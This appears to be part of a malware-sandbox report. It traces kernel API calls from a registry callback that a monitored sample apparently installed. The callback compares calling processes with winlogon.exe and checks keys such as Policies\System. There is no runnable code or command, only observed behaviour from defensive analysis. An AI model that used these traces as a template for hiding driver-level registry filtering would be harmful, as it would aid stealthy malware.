| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6b64, SpinLock_unk_out = 0xffffe0003a7b6b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6b64, SpinLock_unk_out = 0xffffe0003a7b6b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6b64, SpinLock_unk_out = 0xffffe0003a7b6b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6b64, SpinLock_unk_out = 0xffffe0003a7b6b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b6b64, SpinLock_unk_out = 0xffffe0003a7b6b64, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b6b64, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b6b64 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1464, SpinLock_unk_out = 0xffffe0003a7b1464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1464, SpinLock_unk_out = 0xffffe0003a7b1464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1464, SpinLock_unk_out = 0xffffe0003a7b1464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1464, SpinLock_unk_out = 0xffffe0003a7b1464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a7b1464, SpinLock_unk_out = 0xffffe0003a7b1464, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a7b1464, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a7b1464 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77cfe4, SpinLock_unk_out = 0xffffe0003a77cfe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77cfe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77cfe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77cfe4, SpinLock_unk_out = 0xffffe0003a77cfe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77cfe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77cfe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77cfe4, SpinLock_unk_out = 0xffffe0003a77cfe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77cfe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77cfe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77cfe4, SpinLock_unk_out = 0xffffe0003a77cfe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77cfe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77cfe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xffffe0003a77cfe4, SpinLock_unk_out = 0xffffe0003a77cfe4, ret_val_unk_out = 0x2 |
| KeReleaseSpinLock | SpinLock_unk = 0xffffe0003a77cfe4, NewIrql_unk = 0x2, SpinLock_unk_out = 0xffffe0003a77cfe4 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IoCompleteRequest | ret_val_out = 0x0 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5eceb0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55af20, SpinLock_unk_out = 0xfffff800fc55af20, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55af20, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55af20 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x103 |
| KeInitializeEvent | Type_unk = 0x0, State = 0, Event_unk_out = 0xffffd0002d5ece20 |
| KeAcquireSpinLockRaiseToDpc | SpinLock_unk = 0xfffff800fc55c0b0, SpinLock_unk_out = 0xfffff800fc55c0b0, ret_val_unk_out = 0x0 |
| KeReleaseSpinLock | SpinLock_unk = 0xfffff800fc55c0b0, NewIrql_unk = 0x0, SpinLock_unk_out = 0xfffff800fc55c0b0 |
| IofCallDriver | DeviceObject_unk = 0xffffe0004c9e7d00, Irp_unk = 0xffffe0003b7c9cf0, Irp_unk_out = 0xffffe0003b7c9cf0, ret_val_out = 0x0 |
Kernel Graph 4
Code Block #8 (EP #4, #5, #6, #7, #36, #99, #35, #37, #50, #64, #173, #85, #106, #100, #150, #151, #159, #165, #163, #164, #169, #170)
»
| Information | Value |
|---|---|
| Trigger | CmpCallCallBacks+0x3ab |
| Start Address | 0xfffff800fc2cb560 |
Execution Path #4 (length: 3, count: 55198, processes: 37)
»
| Information | Value |
|---|---|
| Sequence Length | 3 |
Processes
»
| Process | Count |
|---|---|
| Process 18 (sppsvc.exe, PID: 3908) | 352 |
| Process 26 (lsass.exe, PID: 540) | 2435 |
| Process 1 (pvdnlz.exe, PID: 2280) | 9 |
| Process 4 (svchost.exe, PID: 628) | 2391 |
| Process 9 (svchost.exe, PID: 972) | 168 |
| Process 12 (svchost.exe, PID: 1052) | 15 |
| Process 30 (explorer.exe, PID: 1184) | 4552 |
| Process 7 (svchost.exe, PID: 888) | 2617 |
| Process 20 (svchost.exe, PID: 3092) | 19 |
| Process 14 (svchost.exe, PID: 1296) | 6 |
| Process 10 (svchost.exe, PID: 1000) | 6573 |
| Process 42 (iexplore.exe, PID: 556) | 1387 |
| Process 36 (wmiadap.exe, PID: 3776) | 2554 |
| Process 110 (dllhost.exe, PID: 2832) | 12 |
| Process 11 (svchost.exe, PID: 324) | 3768 |
| Process 44 (hxtsr.exe, PID: 3844) | 205 |
| Process 15 (svchost.exe, PID: 1560) | 165 |
| Process 31 (taskhostw.exe, PID: 1636) | 1283 |
| Process 24 (csrss.exe, PID: 456) | 59 |
| Process 3 (services.exe, PID: 532) | 642 |
| Process 111 (dllhost.exe, PID: 4116) | 1005 |
| Process 5 (svchost.exe, PID: 660) | 1393 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 224 |
| Process 108 (UNKNOWN, PID: UNKNOWN) | 21 |
| Process 107 (msfeedssync.exe, PID: 4172) | 3302 |
| Process 32 (runtimebroker.exe, PID: 2168) | 109 |
| Process 37 (taskhostw.exe, PID: 3804) | 98 |
| Process 28 (sihost.exe, PID: 1432) | 4170 |
| Process 2 (System, PID: 4) | 69 |
| Process 25 (winlogon.exe, PID: 508) | 14001 |
| Process 22 (csrss.exe, PID: 372) | 4 |
| Process 114 (mpcmdrun.exe, PID: 4164) | 435 |
| Process 116 (UNKNOWN, PID: UNKNOWN) | 387 |
| Process 27 (dwm.exe, PID: 784) | 30 |
| Process 6 (svchost.exe, PID: 860) | 539 |
| Process 17 (svchost.exe, PID: 3128) | 188 |
| Process 104 (wmiprvse.exe, PID: 3620) | 11 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe000412b8840 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe000412b8c90 |
| _stricmp | _Str1 = sppsvc.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
Execution Path #5 (length: 16, count: 79, processes: 12)
»
| Information | Value |
|---|---|
| Sequence Length | 16 |
Processes
»
| Process | Count |
|---|---|
| Process 18 (sppsvc.exe, PID: 3908) | 2 |
| Process 30 (explorer.exe, PID: 1184) | 12 |
| Process 10 (svchost.exe, PID: 1000) | 32 |
| Process 107 (msfeedssync.exe, PID: 4172) | 4 |
| Process 9 (svchost.exe, PID: 972) | 2 |
| Process 26 (lsass.exe, PID: 540) | 10 |
| Process 42 (iexplore.exe, PID: 556) | 2 |
| Process 2 (System, PID: 4) | 2 |
| Process 3 (services.exe, PID: 532) | 2 |
| Process 31 (taskhostw.exe, PID: 1636) | 6 |
| Process 11 (svchost.exe, PID: 324) | 4 |
| Process 36 (wmiadap.exe, PID: 3776) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe000412b8840 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe000412b8c90 |
| _stricmp | _Str1 = sppsvc.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbab90, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9fbab90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c0ef0d8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa2, ret_val_ptr_out = 0xffffe0003af7df50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b9fbab90, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b9fbab90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c0eedb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xa0, ret_val_ptr_out = 0xffffe0003af83ef0 |
| ObQueryNameString | Object_ptr = 0xffffc000b9fbab90, Length = 0xa0, ObjectNameInfo_unk_out = 0xffffe0003af83ef0, ReturnLength_ptr_out = 0xffffd0002c0eedb8, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\WPA\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\WPA\8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-20 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af83ef0, Tag = 0x0 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x2, ret_val_ptr_out = 0xffffe0003c634250 |
| _wcsicmp | _String1 = , _String2 = ImagePath, ret_val_out = -105 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af7df50, Tag = 0x0 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003c634250, Tag = 0x0 |
Execution Path #6 (length: 14, count: 5760, processes: 33)
»
| Information | Value |
|---|---|
| Sequence Length | 14 |
Processes
»
| Process | Count |
|---|---|
| Process 26 (lsass.exe, PID: 540) | 505 |
| Process 1 (pvdnlz.exe, PID: 2280) | 1 |
| Process 4 (svchost.exe, PID: 628) | 258 |
| Process 9 (svchost.exe, PID: 972) | 13 |
| Process 12 (svchost.exe, PID: 1052) | 3 |
| Process 7 (svchost.exe, PID: 888) | 77 |
| Process 10 (svchost.exe, PID: 1000) | 761 |
| Process 36 (wmiadap.exe, PID: 3776) | 1798 |
| Process 11 (svchost.exe, PID: 324) | 364 |
| Process 20 (svchost.exe, PID: 3092) | 1 |
| Process 15 (svchost.exe, PID: 1560) | 33 |
| Process 44 (hxtsr.exe, PID: 3844) | 25 |
| Process 111 (dllhost.exe, PID: 4116) | 104 |
| Process 5 (svchost.exe, PID: 660) | 139 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 25 |
| Process 108 (UNKNOWN, PID: UNKNOWN) | 1 |
| Process 107 (msfeedssync.exe, PID: 4172) | 464 |
| Process 32 (runtimebroker.exe, PID: 2168) | 31 |
| Process 42 (iexplore.exe, PID: 556) | 219 |
| Process 30 (explorer.exe, PID: 1184) | 351 |
| Process 18 (sppsvc.exe, PID: 3908) | 21 |
| Process 28 (sihost.exe, PID: 1432) | 39 |
| Process 37 (taskhostw.exe, PID: 3804) | 2 |
| Process 24 (csrss.exe, PID: 456) | 7 |
| Process 2 (System, PID: 4) | 37 |
| Process 22 (csrss.exe, PID: 372) | 4 |
| Process 116 (UNKNOWN, PID: UNKNOWN) | 32 |
| Process 114 (mpcmdrun.exe, PID: 4164) | 41 |
| Process 3 (services.exe, PID: 532) | 266 |
| Process 6 (svchost.exe, PID: 860) | 127 |
| Process 27 (dwm.exe, PID: 784) | 2 |
| Process 17 (svchost.exe, PID: 3128) | 8 |
| Process 104 (wmiprvse.exe, PID: 3620) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bc6d840 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bc6dc90 |
| _stricmp | _Str1 = lsass.exe, _Str2 = winlogon.exe, ret_val_out = -11 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3f1b90, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3f1b90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c311fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf8, ret_val_ptr_out = 0xffffe0003af89f00 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba3f1b90, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000ba3f1b90, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002c311c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xf6, ret_val_ptr_out = 0xffffe0003af8ff00 |
| ObQueryNameString | Object_ptr = * (e.g. 0xffffc000ba3f1b90), Length = * (e.g. 0xf6), ObjectNameInfo_unk_out = * (e.g. 0xffffe0003af8ff00), ReturnLength_ptr_out = * (e.g. 0xffffd0002c311c98), ret_val_out = * (e.g. 0x0) |
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963}, DestinationString_out = \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{c20d55b1-6c9d-11eb-b0a3-806e6f6e6963} |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 |
Execution Path #7 (length: 15, count: 1446, processes: 17)
»
| Information | Value |
|---|---|
| Sequence Length | 15 |
Processes
»
| Process | Count |
|---|---|
| Process 9 (svchost.exe, PID: 972) | 3 |
| Process 42 (iexplore.exe, PID: 556) | 20 |
| Process 4 (svchost.exe, PID: 628) | 53 |
| Process 31 (taskhostw.exe, PID: 1636) | 415 |
| Process 111 (dllhost.exe, PID: 4116) | 3 |
| Process 16 (officeclicktorun.exe, PID: 1740) | 5 |
| Process 107 (msfeedssync.exe, PID: 4172) | 68 |
| Process 28 (sihost.exe, PID: 1432) | 606 |
| Process 10 (svchost.exe, PID: 1000) | 10 |
| Process 30 (explorer.exe, PID: 1184) | 194 |
| Process 7 (svchost.exe, PID: 888) | 1 |
| Process 116 (UNKNOWN, PID: UNKNOWN) | 49 |
| Process 114 (mpcmdrun.exe, PID: 4164) | 2 |
| Process 27 (dwm.exe, PID: 784) | 6 |
| Process 17 (svchost.exe, PID: 3128) | 6 |
| Process 11 (svchost.exe, PID: 324) | 4 |
| Process 18 (sppsvc.exe, PID: 3908) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003a458540 |
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003a458990 |
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b81a6470, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b81a6470, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002a3b9fb8, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe8, ret_val_ptr_out = 0xffffe0003a763f10 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000b81a6470, ret_val_out = 1 |
| ObQueryNameString | Object_ptr = 0xffffc000b81a6470, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002a3b9c98, ret_val_out = 0xc0000004 |
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xe6, ret_val_ptr_out = 0xffffe0003a763e10 |
| ObQueryNameString | Object_ptr = 0xffffc000b81a6470, Length = 0xe6, ObjectNameInfo_unk_out = 0xffffe0003a763e10, ReturnLength_ptr_out = 0xffffd0002a3b9c98, ret_val_out = 0x0 |
| RtlCopyUnicodeString | SourceString = \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-a0-f9-99-47-25, DestinationString_out = \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-a0-f9-99-47-25 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763e10, Tag = 0x0 |
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\USER\, ret_val_out = 0 |
| _wcsicmp | _String1 = \SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\00-a0-f9-99-47-25, _String2 = \Software\Microsoft\Windows\CurrentVersion\Policies\System, ret_val_out = -7 |
| ExFreePoolWithTag | P_ptr = 0xffffe0003a763f10, Tag = 0x0 |
Execution Path #36 (length: 2102, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 2102 |
Processes
»
| Process | Count |
|---|---|
| Process 7 (svchost.exe, PID: 888) | 1 |
Sequence
»
| Symbol | Parameters | ||||
|---|---|---|---|---|---|
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
